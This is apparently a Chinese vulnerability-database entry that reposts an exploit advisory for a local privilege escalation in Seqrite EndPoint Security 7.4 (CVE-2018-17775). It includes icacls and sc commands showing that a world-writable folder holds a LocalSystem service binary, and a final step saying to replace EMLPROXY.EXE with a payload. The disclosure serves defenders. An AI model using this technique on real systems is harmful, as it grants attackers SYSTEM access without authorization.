Quick Heal Technologies Seqrite EndPoint Security 安全漏洞

https://www.exploit-db.com/exploits/45568
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201810-283

Quick Heal Technologies Seqrite EndPoint Security（EPS）是印度Quick Heal Technologies公司的一套端点安全保护解决方案。该产品具有设备控制、漏洞扫描、补丁管理和资产管理等功能。 Quick Heal Technologies EPS 7.4版本中存在安全漏洞，该漏洞源于程序为%PROGRAMFILES%SeqriteSeqrite文件夹分配了“Everyone: (F)”权限。本地攻击者可通过使用恶意的文件替换可执行文件利用该漏洞提升权限。

# Exploit Title: Seqrite End Point Security 7.4 - Privilege Escalation
# Date: 2018-09-13
# Exploit Author: Hashim Jawad - @ihack4falafel
# Vendor Homepage: https://www.seqrite.com/
# Tested on: Windows 7 Enterprise SP1 (x64)
# CVE: CVE-2018-17775

# Description:
# Seqrite End Point Security v7.4 installs by default to "C:\Program Files\Seqrite\Seqrite" 
# with very weak folder permissions granting any user full permission "Everyone: (F)" 
# to the contents of the directory and it's subfolders. In addition, the program installs handful 
# of services with binaries within the program folder that run as "LocalSystem". Given 
# the "Self Protection" feature (on by default) is disabled which can be done in number of ways 
#(for instance, if the policy does not enforce EPS client password to change the settings any user 
# can disable that feature), meaning a non-privileged user would be able to 
# elevate privileges to "NT AUTHORITY\SYSTEM".

# PoC

c:\>icacls "c:\Program Files\Seqrite\Seqrite"
c:\Program Files\Seqrite\Seqrite Everyone:(OI)(IO)(F)
                                 Everyone:(CI)(F)
                                 NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
                                 NT AUTHORITY\SYSTEM:(I)(F)
                                 NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
                                 BUILTIN\Administrators:(I)(F)
                                 BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                 BUILTIN\Users:(I)(RX)
                                 BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
                                 CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                                 APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                 APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
                                 APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
                                 APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)

Successfully processed 1 files; Failed processing 0 files

c:\>sc qc "Core Mail Protection"

[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Core Mail Protection
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\Seqrite\Seqrite\EMLPROXY.EXE"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Core Mail Protection
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

c:\>icacls "C:\Program Files\Seqrite\Seqrite\EMLPROXY.EXE"
C:\Program Files\Seqrite\Seqrite\EMLPROXY.EXE Everyone:(I)(F)
                                              NT AUTHORITY\SYSTEM:(I)(F)
                                              BUILTIN\Administrators:(I)(F)
                                              BUILTIN\Users:(I)(RX)
                                              APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                              APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
c:\>

# Exploit:

Simply replace "EMLPROXY.EXE" with your preferred payload and wait for execution upon reboot.

来源:packetstormsecurity.com

链接:https://packetstormsecurity.com/files/149586/Seqrite-End-Point-Security-7.4-Privilege-Escalation.html